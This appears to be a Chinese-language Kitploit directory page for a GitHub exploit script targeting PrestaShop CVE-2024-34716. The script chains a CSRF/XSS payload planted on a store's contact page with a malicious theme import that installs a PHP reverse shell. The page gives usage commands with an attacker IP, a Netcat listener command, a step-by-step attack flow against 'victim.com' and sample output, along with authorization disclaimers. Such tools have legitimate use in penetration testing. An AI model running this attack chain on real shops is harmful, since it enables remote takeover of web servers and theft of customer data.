Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/0xdtc/prestashop-cve-2024-34716
Payload生成漏洞利用ShellcodeWeb应用程序漏洞利用渗透测试红队
GitHub0xdtc/prestashop-cve-2024-34716

Prestashop-CVE-2024-34716

自动化针对 CVE-2024-34716 的 CSRF 攻击,在 PrestaShop 上部署 PHP 反向 shell,具有自动化的 payload 打包和 Netcat 监听器设置。

查看仓库
1111年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CSRF 和反向 Shell 攻击的利用脚本

该脚本自动化执行 CSRF(跨站请求伪造)攻击,将 PHP 反向 Shell 上传到目标 Web 服务器并执行它。反向 Shell 通过精心构造的 CSRF Payload 以 ZIP 文件形式传递,当特权用户与特定端点交互时触发。该脚本需要一个监听中的 Netcat 实例来捕获反向 Shell 连接。

目前似乎存在问题,稍后更新

要求

  • Netcat:确保已安装 Netcat 并能够监听指定端口(默认:9001)。
  • Python 3:用于通过 HTTP 提供文件服务。
  • Curl 和 JQ:用于获取和处理 HTTP 请求及 JSON 解析。

用法

root@kitploit:~
./exploit.sh <target_url> <admin_endpoint> <admin_email> <attacker_ip>

参数

  • target_url:目标的基础 URL(例如 https://example.com)。
  • admin_endpoint:管理员主题导入端点的路径。
  • admin_email:管理员邮箱地址(用于在 Payload 中伪造)。
  • attacker_ip:反向 Shell 监听器将接收连接的 IP 地址。

示例

root@kitploit:~
./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10

攻击流程

  1. 创建反向 Shell:使用 revshells.com 基于提供的 attacker_ip 和端口 9001 生成 PHP 反向 Shell。
  2. 打包成 ZIP:反向 Shell 脚本 (love.php) 被压缩为 Love-exploit.zip。
  3. 获取 CSRF Token:从目标检索 CSRF Token,以授权主题导入请求。
  4. 构建 HTML Payload:构建一个 HTML Payload (csrf_payload.html),其中包含一个 JavaScript 脚本,用于自动向目标管理面板提交恶意请求以导入反向 Shell。
  5. 启动 HTTP 服务器:在端口 8000 上启动临时 HTTP 服务器,提供 Love-exploit.zip 文件供目标导入。
  6. 上传 XSS 并触发 CSRF:将 CSRF Payload 上传到目标的联系页面。当被访问时,触发 CSRF 攻击。
  7. 反向 Shell 监听:攻击者使用 Netcat 监控来自受害者的入站连接。

执行步骤

  1. 在您的机器上启动 Netcat 监听器:

    root@kitploit:~
    nc -nvlp 9001
    
  2. 运行脚本:

    root@kitploit:~
    ./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
    
  3. 等待目标执行 CSRF Payload 并接收反向 Shell 连接。

输出

脚本在执行期间输出以下信息:

  • CSRF Token 获取状态。
  • 反向 Shell 创建和打包状态。
  • Payload 传递和 HTTP 服务器状态。

重要说明

  • 权限:此脚本需要获得目标服务器的执行权限。未经授权使用属于违法行为,将受到法律严惩。
  • 测试环境:仅在受控的授权环境中使用,例如网络安全实验室。
  • 端口冲突:运行脚本前,请确保端口 8000(HTTP 服务器)和 9001(Netcat 监听器)未被占用。

示例输出

root@kitploit:~
[*] 确保 Netcat 正在监听:nc -nvlp 9001
[*] 等待 netcat 监听器...
[*] 正在创建 PHP 反向 Shell...
[*] 正在将 Shell 打包为 Love-exploit.zip...
[*] 正在获取 CSRF Token...
[+] CSRF Token 已获取:<token_value>
[*] 正在构建用于 CSRF 的 HTML Payload...
[*] 正在将 HTML 转换为 PNG...
[*] 正在检查端口 8000 上是否已有 HTTP 服务器...
[*] 正在启动新的 HTTP 服务器,端口 8000 用于 Payload 传递...
[*] 正在上传 XSS Payload 以触发 CSRF...
[*] 保持脚本运行以监控入站连接...

本文档仅供渗透测试人员和网络安全研究人员在受控环境中使用。未经授权的工具滥用是被严格禁止的。


免责声明

此脚本仅用于教育目的和合法的网络安全评估。未经许可对系统进行未授权使用是违法的,并且违反道德准则。

下载工具